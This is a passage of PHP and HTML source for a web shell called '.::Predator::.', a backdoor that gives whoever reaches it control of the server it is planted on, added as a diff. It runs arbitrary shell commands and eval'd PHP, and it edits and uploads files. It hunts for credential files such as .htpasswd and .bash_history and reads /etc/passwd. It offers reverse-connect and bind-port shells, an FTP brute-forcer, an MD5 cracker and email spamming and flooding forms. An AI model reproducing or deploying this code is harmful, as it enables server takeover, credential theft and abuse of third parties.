+elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');}
+elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');}
+elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');}
+elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');}
+elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');}
+elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');}
+elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');}
+elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');}
+elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');}
+elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');}
+elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');}
+elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');}
+elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');}
+elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');}
+elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');}
+elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');}
+elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');}
+elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');}
+}
+
+function testperl()
+{
+	if(ex('perl -h'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testlynx()
+{
+	if(ex('lynx --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function testfetch()
+{
+	if(ex('fetch --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testwget()
+{
+	if(ex('wget --help'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function oracle()
+{
+	if(function_exists('ocilogon'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function postgresql()
+{
+	if(function_exists('pg_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+
+function testmssql()
+{
+	if(function_exists('mssql_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function testcurl()
+{
+	if(function_exists('curl_version'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function testmysql()
+{
+	if(function_exists('mysql_connect'))
+	{
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		return "<font size=2 color=red>OFF</font>";
+	}
+}
+function safe_mode()
+{
+if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
+	{
+		$_SESSION['safe_mode'] = 1;
+		return "<font size=2 color=green>ON</font>";
+	}else{
+		$_SESSION['safe_mode'] = 0;
+		return "<font size=2 color=red>OFF</font>";
+	}
+};
+
+function ex($in)
+{
+$out = '';
+
+
+if(function_exists('exec'))
+	{
+		exec($in,$out);
+		$out = join("\n",$out);
+	}
+elseif(function_exists('passthru'))
+	{
+		ob_start();
+		passthru($in);
+		$out = ob_get_contents();
+		ob_end_clean();
+	}
+elseif(function_exists('system'))
+	{
+		ob_start();
+		system($in);
+		$out = ob_get_contents();
+		ob_end_clean();
+	}
+elseif(function_exists('shell_exec'))
+	{
+		$out = shell_exec($in);
+	}
+elseif(is_resource($f = popen($in,"r")))
+  {
+   $out = "";
+   while(!@feof($f)) { $out .= fread($f,1024); }
+   pclose($f);
+  }
+return $out;
+}
+
+function shell()
+{
+if($_POST['type']==1)
+	{		
+		eval(stripslashes($_POST['value']));
+	}
+elseif($_POST['type']==2)
+	{
+		pwd();
+		print_r(ex(stripslashes($_POST['value'])));
+	}
+elseif($_POST['type']==3)
+	{
+		if($_SESSION['safe_mode'] == 1){
+		if(($u=safe_ex('ls -la'))!='')
+		{return $u;}else{return safe_ex('dir');};
+		
+		}else{
+		if(($u=ex('ls -la'))!='')
+		{return $u;}else{return ex('dir');};
+		}
+	}
+elseif($_POST['type']==4)
+	{
+		if(file_exists(stripslashes($_POST['value'])))
+			{
+				if($safe_mode!=1){
+				echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
+				}else{
+				echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
+				};
+				$_SESSION['edit']=1;
+				$_SESSION['filename'] = $_POST['value'];
+			}else{
+				return 'File doesn\'t exists!';
+			}
+	}
+elseif($_POST['type']==5)
+	{
+		fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
+	}
+elseif($_POST['type']==6)
+	{
+		$uploaddir = pwd();
+		if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
+		move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); 	
+	}
+elseif($_POST['type']==7)
+	{
+		echo alias($_POST['value']);
+	}
+elseif($_POST['type']==8)
+	{
+		echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
+	}
+elseif($_POST['type']==9)
+	{
+		echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
+	}
+elseif($_POST['type']==10)
+	{
+		echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
+	}
+elseif($_POST['type']==12)
+	{
+		echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
+	}
+elseif($_POST['type']==13)
+	{
+		echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
+	}
+elseif($_POST['type']==14)
+	{
+		echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
+	}
+
+else 
+	{$u = ex('ls -la');
+	 if($u == ''){return ex('dir');}else{return $u;};
+	}
+
+return null;
+};
+
+function edit()
+{
+if ($_SESSION['edit'] == 1){
+$_SESSION['edit']=0;
+return "<br><center><input type=submit style=\"border:1px solid #666666;background:#333333;font-weight:bold;\" value=\"Save\"></center>";};
+}
+
+function getsystem()
+{
+	return php_uname('s')." ".php_uname('r')." ".php_uname('v');
+};	
+
+function getserver()
+{
+	return getenv("SERVER_SOFTWARE");
+};
+
+
+function getuser()
+{
+$out = get_current_user();	
+	if($out!="SYSTEM")
+		{
+			if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
+		}
+return $out;
+};
+
+function pwd()
+{
+if($_POST['type']==3)
+	{
+		$_SESSION['pwd'] = stripslashes($_POST['value']);
+	}
+chdir($_SESSION['pwd']);
+$cwd = getcwd();
+if($u=strrpos($cwd,'/'))
+	{
+		if($u!=strlen($cwd)-1){
+		return $cwd.'/';}
+		else{return $cwd;};
+	}
+elseif($u=strrpos($cwd,'\\'))
+	{
+		if($u!=strlen($cwd)-1){
+		return $cwd.'\\';}
+		else{return $cwd;};
+	};
+}
+
+function safe_ex($in)
+{
+if($in){
+$d=dir('.');
+
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y	 H:i",$mtime)."	";
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+}
+
+function safe_read($in)
+{
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+include("/etc/passwd");
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+
+file_get_contents($in);
+}
+
+}
+?>
+
+
+
+
+
+
+
+
+
+
+<html>
+<head>
+<title>.::Predator::.</title>
+<META http-equiv="Content-Type" content="text/html; charset=CP866">
+<style type=text/css>
+.ta {background: #333333; border:1px solid #666666; color: #FFFFFF;}
+.bt {border: 1px solid #666666;background: #333333;font-weight:bold;}
+.td1 {border:2px solid #000000;}
+.td2 {border:1px solid #000000;}
+.ram {border:1px solid #666666;background:#222222;}
+body { scrollbar-base-color: #333333}
+</style>
+<script>
+function kill()
+{
+var y;
+y = confirm('Are you really want to kill shell?');
+if(y == true)
+{
+document.location = '?kill=yes';
+}
+}
+</script>
+</head>
+<body bgcolor='#000000'>
+<center><table width=90% cellpadding=0 cellspacing=0 style="border: 1px solid #666666">
+<tr><td width=100% height=70 bgcolor='#333333' style="border-bottom: 2px solid #666666" valign=top>
+<table valign=top>
+<tr><td valign=top>
+<table valign=center class='ram'>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>System:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getsystem();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>Server:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getserver();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>User:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getuser();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>pwd:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></b></font>
+</td></tr>
+</table>
+</td>
+<td width=13% valign=center align=center>
+<table width=100% height=100% cellpadding=0 cellspacing=0><tr><td width=100% height=100%>
+<center>
+<a href="http://h0ld-up.info"><table cellpadding=2 cellspacing=2 style="border:1px solid #666666;background:#444444">
+<tr><td><font size=2 color=#999999>
+<center><b>.::h0ld-up-team::.<br>web-shell</b></center>
+</font></td></tr></table></a></center>
+</td></tr><tr><td height=5></td></tr><tr><td>
+<center>
+
+<input type=submit style="border:1px solid #666666;background: darkred;font-weight:bold;" value='   Kill Shell   ' onclick='kill()'>
+
+</center>
+</td></tr></table>
+
+</td>
+<td class='ram' width=45% valign=center align=center>
+<table  cellpadding=0 cellspacing=0>
+<tr><td>
+<table valign=top cellpadding=0 cellspacing=0>
+<tr><td align=right>
+<font size=2 color='#888888'>PHP-version:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>MySQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>MSSQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>PostgreSQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>Oracle:</font>
+</td></tr>
+</table>
+</td><td>
+<table valign=top  cellpadding=0 cellspacing=0>
+<tr><td>
+<b><font size=2 color=red><?php echo phpversion();?></font></b>
+</td></tr>
+<tr><td>
+<b><?php echo testmysql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo testmssql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo postgresql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo oracle();?></b>
+</td></tr>
+</table>
+</td><td width=4%></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Safe_mode:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>cURL:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>wget:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>fetch:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>lynx:</font>
+</td></tr>
+</table></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top>
+<b><?php echo safe_mode();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testcurl();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testwget();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testfetch();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testlynx();?></b>
+</td></tr>
+</table></td>
+<td width=4%></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Perl:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Server time:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Server date:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Total space:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Free space:</font>
+</td></tr>
+</table></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top>
+<b><font size=2 color=green><?php echo testperl();?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo date('H:i');?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo date('d-m-Y');?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo view_size(disk_total_space(getcwd()));?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo view_size(diskfreespace(getcwd()));?></font></b>
+</td></tr>
+</table></td></tr>
+</table>
+</td></tr>
+</table>
+</td></tr>
+<tr><td width=100% height=100% bgcolor='#333333' valign=top>
+<table width=100%>
+<tr><td valign=top align=center>
+<table width=100% height=200 class='td1'>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<input type=hidden name="type" value=5>
+<textarea cols=80 rows=13 name="value" class='ta'>
+<?php echo htmlspecialchars(shell());?>
+</textarea><?php echo edit();?></form>
+</td>
+
+
+
+<td valign=top align=left width=10%>
+<table width=100% height=100% class='td2'>
+<form action method=POST><tr><td valign=top align=left height=40% style="border-bottom: 1px solid #000000;">
+<b>.::System shell::.</b><br>
+<input type=hidden name="type" value=2>
+<center><input type=text name="value" size=35 class='ta'></center>
+</ br><center><input type=submit value="Enter" style="border-top: 1px solid #333333;border-bottom: 1px solid #666666;border-right: 1px solid #666666;border-left: 1px solid #666666;background: #333333;font-weight:bold;"></center>
+</td></tr></form>
+<tr><td valign=top align=left>
+<form action method=POST>
+<table>
+<tr><td>
+<b>.::PHP-code::.</b>
+</td><td align=right>
+<input type=submit value="Run code" class='bt'>
+<input type=hidden name="type" value=1>
+</td></tr>
+<tr><td colspan=2>
+<textarea rows=5 cols=26 name="value" class='ta'><?php echo "readfile('/etc/passwd');";?></textarea>
+</td></tr>
+</table></form>
+</td></tr>
+</table>
+</td></tr>
+</table>
+<table>
+<tr><td height=0></td></tr>
+</table>
+<table width=100% height=80 class='td1' valign=top>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::PWD::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="cd">
+<input type=hidden name="type" value=3>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
+</td></tr>
+</table></form></td><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::File Edit::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="Edit">
+<input type=hidden name="type" value=4>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=72 value=<?php echo pwd();?>>
+</td></tr>
+</table></form>
+</td></tr>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Download::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="Download">
+<input type=hidden name="type" value=11>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
+</td></tr>
+</table></form></td><td valign=top align=left width=50%>
+<form enctype="multipart/form-data" action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Upload::.</b>
+</td><td align=right colspan=3>
+<input type=submit class='bt' value="Upload">
+<input type=hidden name="type" value=6>
+</td></tr>
+<tr><td colspan=2>
+<font size=2 color=#888888>New name:</b>
+<input type=text size=15 name="newname" class=ta>
+</td><td width=4></td><td colspan=2>
+<input type=file name="userfile" size=28>
+</td></tr>
+</table></form>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Alias::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="RUN">
+<input type=hidden name="type" value=7>
+</td></tr>
+<tr><td colspan=2>
+<select name='value' class='ta' width=200>
+<option>find apahce config file</option>
+<option>find access_log files</option>
+<option>find error_log files</option>
+<option>find suid files</option>
+<option>find suid files in current dir</option>
+<option>find sgid files</option>
+<option>find sgid files in current dir</option>
+<option>find config.inc.php files</option>
+<option>find config.inc.php files in current dir</option>
+<option>find config* files</option>
+<option>find config* files in current dir</option>
+<option>find all writable files</option>
+<option>find all writable files in current dir</option>
+<option>find all writable directories</option>
+<option>find all writable directories in current dir</option>
+<option>find all writable directories and files</option>
+<option>find all writable directories and files in current dir</option>
+<option>find all service.pwd files</option>
+<option>find service.pwd files in current dir</option>
+<option>find all .htpasswd files</option>
+<option>find .htpasswd files in current dir</option>
+<option>find all .bash_history files</option>
+<option>find .bash_history files in current dir</option>
+<option>find all .mysql_history files</option>
+<option>find .mysql_history files in current dir</option>
+<option>find all .fetchmailrc files</option>
+<option>find .fetchmailrc files in current dir</option>
+<option>list file attributes on a Linux second extended file system</option>
+<option>show opened ports</option>
+<option>---------------------------------------------------------------------------------------------------------</option>
+</select>
+</td></tr>
+</table></form></td>
+<script>
+function base64Encode(str)
+{
+	var charBase64 = new Array(
+		'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
+		'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
+		'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
+		'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
+	);
+
+	var out = "";
+	var chr1, chr2, chr3;
+	var enc1, enc2, enc3, enc4;
+	var i = 0;
+
+	var len = str.length;
+
+	do
+	{
+		chr1 = str.charCodeAt(i++);
+		chr2 = str.charCodeAt(i++);
+		chr3 = str.charCodeAt(i++);
+
+
+		enc1 = chr1 >> 2;
+		enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
+		enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
+		enc4 = chr3 & 0x3F;
+
+		out += charBase64[enc1] + charBase64[enc2];
+
+		if (isNaN(chr2))
+  		{
+			out += '==';
+		}
+  		else if (isNaN(chr3))
+  		{
+			out += charBase64[enc3] + '=';
+		}
+		else
+		{
+			out += charBase64[enc3] + charBase64[enc4];
+		}
+	}
+	while (i < len);
+
+	return out;
+}
+
+
+function base64Decode(str)
+{
+	var indexBase64 = new Array(
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
+		52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
+		-1, 0, 1, 2,  3, 4, 5, 6,  7, 8, 9,10, 11,12,13,14,
+		15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
+		-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
+		41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
+	);
+
+	var out = "";
+	var chr1, chr2, chr3;
+	var enc1, enc2, enc3, enc4;
+	var i = 0;
+
+
+	str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
+
+	var len = str.length;
+
+	do
+	{
+		enc1 = indexBase64[str.charCodeAt(i++)];
+		enc2 = indexBase64[str.charCodeAt(i++)];
+		enc3 = indexBase64[str.charCodeAt(i++)];
+		enc4 = indexBase64[str.charCodeAt(i++)];
+
+		chr1 = (enc1 << 2) | (enc2 >> 4);
+		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+		chr3 = ((enc3 & 3) << 6) | enc4;
+
+		out += String.fromCharCode(chr1);
+
+		if (enc3 != -1)
+		{
+			out += String.fromCharCode(chr2);
+		}
+		if (enc4 != -1)
+		{
+			out += String.fromCharCode(chr3);
+		}
+	}
+	while (i < len);
+
+	if (i != len)
+	{
+		new Error(BASE64_BROKEN);
+		return "";
+	}
+
+	return out;
+}
+
+</script>
+<td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td width=1%>
+<b>.::Base64_encode::.</b>
+</td><td align=right width=6%>
+<input type=button value="encode" class='bt' onclick='t.value=base64Encode(t.value)'>	
+</td>
+<form action method=POST><td width=1%>
+<b>.::Base64_decode::.</b>
+</td><td align=right width=6%>
+<input type=button value="decode" class='bt' onclick='n.value=base64Decode(n.value)'>	
+</td></tr>
+<tr><td colspan=2>
+<input type=text name='t' class='ta' size=34>
+</td><td colspan=2>
+<input type=text name='n' class='ta' size=34>
+</td></tr>
+</table></form>
+</td></tr>
+</td></tr>
+</table>
+</td></tr><tr></tr><tr><td>
+<table cellpadding=0 cellspacing=0><tr><td>
+<table class='td1' width=226>
+<tr><td width=100% class='td2'>
+<form action method=POST>
+<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
+<b>.::Back Connect::.</b></td></tr>
+<tr><td width=100% height=10 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2><b>IP:</b></font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='ip' size=15 value=<?php echo $_SERVER['REMOTE_ADDR'];?>></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>port:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='port' size=10 value='5000'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<select class='ta' name='method'>
+<option>Perl</option>
+<option>C#</option>
+<option>---------------------</option>
+</select></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=100% align=right colspan=3>
+<input type=hidden name='type' value='12'>
+<input type=submit value='Connect' class='bt'></form>
+<tr><td width=100% height=5 colspan=3></td></tr>
+</table>
+</td></tr>
+</table>
+</td><td width=5></td><td>
+<table class='td1' width=226>
+<tr><td width=100% class='td2'>
+<form action method=POST>
+<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
+<b>.::Bind port::.</b></td></tr>
+<tr><td width=100% height=10 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2><b>Port:</b></font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='port' size=15 value='6000'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>pass:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='pass' size=10 value='hshell'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<select class='ta' name='method'>
+<option>Perl</option>
+<option>C#</option>
+<option>---------------------</option>
+</select></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=100% align=right colspan=3>
+<input type=hidden name='type' value='12'>
+<input type=submit value='Bind' class='bt'></form>
+<tr><td width=100% height=5 colspan=3></td></tr>
+</table>
+</td></tr>
+</table>
+</td><td width=5></td><td width=50% height=141>
+<table class='td1' width=100% height=100% valign=top><tr><td width=100% height=100% class='td2' valign=top>
+<table cellpadding=0 cellspacing=0 width=95%><tr><td colspan=4>
+<b>.::md5 bruter::.</b>
+</td></tr><tr><td height=10></td></tr>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right><b>hash:</b></font></td><td width=5></td><td align=right>
+<input type=text name='hash' class='ta' size=50>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right>log_file:</font></td><td width=5></td><td align=right>
+<input type=text name='log' class='ta' size=30 value='md5_log.txt'>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right>dictionary_file:</font></td><td width=5></td><td align=right>
+<input type=text name='dict' class='ta' size=30 value='md5_dict.txt'>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+</td><td width=5></td><td align=right>
+<input type=submit class='bt' value='Start Brute'>
+</td></tr>
+</table>
+</td></tr></table>
+</td></tr></table>
+<tr></tr><tr><td>
+<table class='td1' width=100% height=310 valign=top align=left>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td valign=top colspan=3 height=30>
+<b>.::Spammer::.</b>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>emails_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='elist' class='ta' size=17 value="emails.txt">
+</td></tr><tr><td height=5></td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>log_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='log' class='ta' size=17 value="mail_log.txt">
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>From:</font>
+</td><td width=65% align=right>
+<input type=text name='from' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Subject:</font>
+</td><td width=65% align=right>
+<input type=text name='subject' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Message:</font>
+</td><td width=65% align=right>
+<textarea name='msg' class='ta' cols=20 rows=4></textarea>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Check<sup>*</sup>:</font>
+</td><td width=65% align=right>
+<input type=text name='check' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+</td><td width=65% align=right>
+<input type=submit class='bt' value="Start">
+<input type=hidden name='type' value=10>
+</td></tr>
+</table></form>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td colspan=3 height=30 valign=top><b>.::FTP-Brute::.</b></td></tr>
+<tr><td width=31% align=right>
+<font color=#888888 size=2><b>Host:</b></font>
+</td><td align=right>
+<input type=text name='host' class='ta' size=28>
+</td><td width=5%></td></tr><tr><td height=35 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_users file:</font>
+</td><td align=right>
+<input type=text name='users' class='ta' size=17 value="ftp_users.txt">
+</td><td></td></tr>
+<tr><td height=5 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_passwd file:</font>
+</td><td align=right>
+<input type=text name='passwd' class='ta' size=17 value="ftp_passwds.txt">
+</td><td></td></tr>
+<tr><td height=5 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_log file:</font>
+</td><td align=right>
+<input type=text name='log' class='ta' size=17 value="ftp_log.txt">
+</td><td></td></tr>
+<tr><td colspan=2 height=20></td></tr>
+<tr><td colspan=2 align=right>
+<input type=submit class='bt' value="Start Brute">
+<input type=hidden name="type" value=9>
+</td></tr>
+</td></table></form>
+<form action method=POST>
